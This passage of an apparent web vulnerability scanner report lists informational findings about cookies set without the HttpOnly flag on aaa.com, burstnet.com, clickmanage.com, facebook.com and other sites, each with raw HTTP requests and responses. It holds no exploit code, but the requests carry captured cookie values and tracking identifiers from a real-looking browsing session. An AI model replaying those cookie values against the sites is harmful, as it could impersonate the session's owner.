Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=e9b0b7965c774fdb94f4dbbf73989380; CC=US; CULTURE=EN-US; v1st=D4335FAB02FF2C98; ATC_ID=173.193.214.243.1307039206918742; VWCUKP300=L123100/Q72318_13861_1563_060211_1_060311_443106x442830x060211x1x1/Q73186_13384_1473_060111_1_061517_449169x449165x060111x1x1; __qca=P0-1267859454-1307060745444; MSNMOBREP=dcecbf9971484c8dbc4017eb007d89c3; __switchTo5x=94; __unam=7a54b75-130adfe6f89-5d6f1b4f-2; MUID=E361C23374E642C998D8ABA7166A75EC; MSNTVID=e9b0b7965c774fdb94f4dbbf73989380; mh=LENOVO; Sample=93; SRCHHPGUSR=AS=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Machine: CH1********302
Set-Cookie: zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; domain=msn.com; expires=Tue, 26-Jul-2011 15:16:35 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:16:35 GMT
Content-Length: 185
Connection: keep-alive

jsonp1311088599886({"user":{"country":{"name":{"$":'US'},"flags":{"$":'40000000'},"zip":{"$":'75207'},"$":null},"market":{"name":{"$":'en-us'},"enabled":{"$":'True'},"$":null},"$":""}})

14.136. http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aaa.com
Path:   /scripts/WebObjects.dll/ZipCode.woa/wa/route

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /scripts/WebObjects.dll/ZipCode.woa/wa/route HTTP/1.1
Host: www.aaa.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 Apple
Date: Tue, 19 Jul 2011 19:04:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONi OUR NOR IND PHY ONL UNI PUR COM NAV INT DEM STA PRE"
UniqueName: CHIWWW4
X-Powered-By: ASP.NET
content-type: text/html
set-cookie: zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:04:09 GMT; path=/; domain=aaa.com
set-cookie: zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:04:09 GMT; path=/; domain=aaa.com
content-length: 1151

<HTML>
<HEAD>
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<META HTTP-EQUIV="REFRESH" CONTENT="5;URL=http://www.nne.aaa.com?zip=05672">


<TITLE>www.aaa.com redirect</TITLE>
</HE
...[SNIP]...

14.137. http://www.adminitrack.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adminitrack.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?gclid=COjL1IrNjaoCFQ495QodxUaNzg HTTP/1.1
Host: www.adminitrack.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 19 Jul 2011 14:20:31 GMT
Content-Length: 28976
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: AT=VISITOR=Y; expires=Wed, 18-Jul-2012 14:20:31 GMT; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta h
...[SNIP]...

14.138. http://www.burstnet.com/enlightn/7117//930F/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /enlightn/7117//930F/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enlightn/7117//930F/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/app/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16vda0204fei8g; 56Q8=3xpADaXQYdUGsRSf7wh-rBNRO0PfAQMVRhXbM9AvupBS1rKdv8AEW6Q; CMP=193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EcU^13v.1EcU^13R.1EcU^1AF.1GGd^jx.1Ebs^h2.1Ebs^vO.101Ebs

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Tue, 19 Jul 2011 20:26:02 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EcU^13v.1EcU^1AF.1GGd^jx.1Ebs^h2.1Ebs^vO.101Ebs; path=/; expires=Thu, 19-Jul-2012 20:26:02 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;

14.139. http://www.burstnet.com/enlightn/7121//7128/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /enlightn/7121//7128/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enlightn/7121//7128/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/app/answers/detail/a_id/861/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16vda0204fei8g; 56Q8=3xpADaXQYdUGsRSf7wh-rBNRO0PfAQMVRhXbM9AvupBS1rKdv8AEW6Q; CMS=/; CMP=193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EcU^1AF.1GGd^jx.1Ebs^h2.1Ebs^vO.101Ebs

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Tue, 19 Jul 2011 20:27:34 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^1AF.1GGd^jx.1Ebs^h2.1Ebs^vO.101Ebs; path=/; expires=Thu, 19-Jul-2012 20:27:34 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;

14.140. http://www.burstnet.com/enlightn/7177//7F4D/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /enlightn/7177//7F4D/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enlightn/7177//7F4D/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/app/answers/list/c/188,624/catname/Game%20issues/session/L3NpZC9GZUNoRm96aw%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16vda0204fei8g; 56Q8=3xpADaXQYdUGsRSf7wh-rBNRO0PfAQMVRhXbM9AvupBS1rKdv8AEW6Q; CMS=/; CMP=193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EcU^13v.1EcU^1AF.1GGd^jx.1Ebs^h2.1Ebs^vO.101Ebs

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Tue, 19 Jul 2011 20:26:48 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EcU^1AF.1GGd^jx.1Ebs^h2.1Ebs^vO.101Ebs; path=/; expires=Thu, 19-Jul-2012 20:26:48 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;

14.141. http://www.clickmanage.com/events/clickevent.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clickmanage.com
Path:   /events/clickevent.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /events/clickevent.aspx?ca=10332&e=4&l=1044996461&u=http%25253A%25252F%25252Fwww.numarasoftware.com%25252Fwelcome%25252Fservice_desk.aspx%25253Fsrc%25253Dgoogle%252526trm%25253Dissue_tracking_software&gclid=CIGmsIfNjaoCFct95QodzRHo0Q HTTP/1.1
Host: www.clickmanage.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Tue, 19 Jul 2011 14:20:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
P3P: policyref="http://www.clickmanage.com/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Location: http://www.numarasoftware.com/welcome/service_desk.aspx?src=google&trm=issue_tracking_software
Set-Cookie: uid=21367747-2c53-4cc6-a391-4d75cc92d57b; expires=Wed, 18-Jul-2012 14:20:23 GMT; path=/
Set-Cookie: cp=10332,634466676237062500,4,1044996461,599266080000000000,0*|; expires=Wed, 18-Jul-2012 14:20:23 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 215

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='http://www.numarasoftware.com/welcome/service_desk.aspx?src=google&amp;trm=issue_tracking_software'>here</a>.</h2>
<
...[SNIP]...

14.142. http://www.facebook.com/advertising/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /advertising/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /advertising/?campaign_id=402047449186&placement=pflo&extra_1=0 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffacebook; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fadvertising%2F%3Fcampaign_id%3D402047449186%26placement%3Dpflo%26extra_1%3D0; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.88.37
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:45 GMT
Content-Length: 22238

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/advertising\/index.php";window._EagleEyeSeed="42vQ";</scr
...[SNIP]...

14.143. http://www.facebook.com/badges/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /badges/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /badges/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fbadges%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.92.64
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:33 GMT
Content-Length: 15265

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/badges\/index.php";window._EagleEyeSeed="emCA";</script><
...[SNIP]...

14.144. http://www.facebook.com/careers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /careers/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /careers/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php%3Fref_type%3Dsitefooter

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.121.46
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:50 GMT
Content-Length: 20897

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/careers\/index.php";window._EagleEyeSeed="Ikcl";</script>
...[SNIP]...

14.145. http://www.facebook.com/directory/pages/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /directory/pages/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /directory/pages/ HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; wd=1065x723; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpeople%2F

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpages%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.102.50
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:38 GMT
Content-Length: 49022

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/directory\/index.php";window._EagleEyeSeed="0cuF";</scrip
...[SNIP]...

14.146. http://www.facebook.com/directory/people/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /directory/people/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /directory/people/ HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpeople%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.82.36
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:34 GMT
Content-Length: 39849

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/directory\/index.php";window._EagleEyeSeed="kzvV";</scrip
...[SNIP]...

14.147. http://www.facebook.com/facebook  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /facebook

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /facebook HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpages%2F; wd=1065x723

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffacebook; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.89.42
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:40 GMT
Content-Length: 130477

<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:og="http://opengraphprotocol.org/schema/" lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>Cav
...[SNIP]...

14.148. http://www.facebook.com/find-friends  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /find-friends

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /find-friends?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.95.36
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:28 GMT
Content-Length: 104185

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/vanityurl.php";window._EagleEyeSeed="ZSxE";</script><nosc
...[SNIP]...

14.149. http://www.facebook.com/help/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /help/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /help/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf; __utma=87286159.39218672.1311087479.1311087479.1311087479.1; __utmb=87286159.1.10.1311087479; __utmc=87286159; __utmz=87286159.1311087479.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wd=1065x723

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
